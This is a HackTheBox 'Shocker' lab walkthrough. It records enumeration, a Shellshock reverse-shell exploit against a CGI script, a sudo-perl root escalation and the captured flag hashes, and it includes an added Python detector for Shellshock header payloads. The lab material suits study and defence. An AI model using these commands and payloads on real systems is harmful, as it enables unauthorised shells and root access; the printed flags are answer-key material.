Shocker

1/20/24

easy

Scanning

sudo nmap -A -T4 -v 10.10.10.56 -oA scans/scan

Open ports

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

http, ssh

Let's check out the web server.

image
image

Tried to find some directories; not getting anywhere.

Check versions - Apache 2.4.18

image

Try 29316.py

image

No luck!

SSH is recent enough, probably not vulnerable.

Back to scanning.

Using dirsearch a second time, I actually found some directories

dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -e php,txt,html -f -r -u http://10.10.10.56
image

We see /cgi-bin exists, so let's include common execution extensions and search in that subdirectory.

dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -e cmd,sh,py -f -r -u http://10.10.10.56/cgi-bin

We got something!

image

See what we can see

image
image

This seems like the path.

I read a bit about this here:

Exploitation

Googling for potential exploits

image

The name of the box is Shocker, which is a strong indication that Shellshock is the initial access vector.

Hacktricks has a solid writeup for this type of vulnerability and ways to detect it.
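As an added example (not code from the original writeup or from HackTricks), here is a Python check that scans Apache combined-format access log lines for the bash function-definition prefix that Shellshock requests carry in a header. The log lines are constructed for the example; in this log format only the Referer and User-Agent headers are recorded, so those are the two fields the check can inspect after the fact.

```python
import re

# Shellshock abuse of a CGI endpoint arrives as an HTTP header whose value
# begins with a bash function definition, "() {". Vulnerable bash versions
# evaluated it when the web server exported the header into the environment
# of the CGI script, so the prefix itself is the detection signature.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache combined log format: client, ident, user, [time], "request", status,
# bytes, "referer", "user-agent". Referer and User-Agent are the only request
# headers this format records.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

HEADER_FIELDS = ("referer", "agent")


def parse_combined(line):
    """Return a dict of the combined-format fields, or None if the line does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock_attempt(entry):
    """True if any logged header field carries the function-definition prefix."""
    return any(SHELLSHOCK_RE.search(entry[f] or "") for f in HEADER_FIELDS)


def find_shellshock_attempts(lines):
    """Return (client, request, offending field) tuples for every matching line."""
    hits = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue
        for field in HEADER_FIELDS:
            if SHELLSHOCK_RE.search(entry[field] or ""):
                hits.append((entry["client"], entry["request"], field))
                break
    return hits


# Constructed sample log lines (not taken from the box). The third line carries
# the signature in its User-Agent, the fourth in its Referer; the first two are
# ordinary requests and must not be flagged.
SAMPLE_LOG = [
    '10.10.14.43 - - [20/Jan/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.43 - - [20/Jan/2024:10:01:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.88.1"',
    '10.10.14.43 - - [20/Jan/2024:10:01:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo vulnerable"',
    '10.10.14.43 - - [20/Jan/2024:10:01:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, request, field in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{client} {request!r} via {field}")
```

This is a retrospective check only: headers that the combined format does not log (Cookie, custom headers) carry the same payload and are invisible here, so the durable fixes are a patched bash and not exposing shell-backed CGI scripts, with a request-time filter on the same prefix as a stopgap.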

Let's find a script to use against this vuln:

shellpoc.py

Let's listen and make the attempt!

nc -lvnp 42069
python shock.py 10.10.10.56 /cgi-bin/user.sh 10.10.14.43/42069
image
image
c95900e8520d3a31d2aa11bde8345108

Privilege Escalation

Check for low hanging fruit

sudo -l
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

We can run perl as root without a password!

Can we just use -e to exec sh?

sudo /usr/bin/perl -e 'exec "/bin/sh";'

Yup, that's root.

image
image
7542c186b162caa6b4ada0311995a374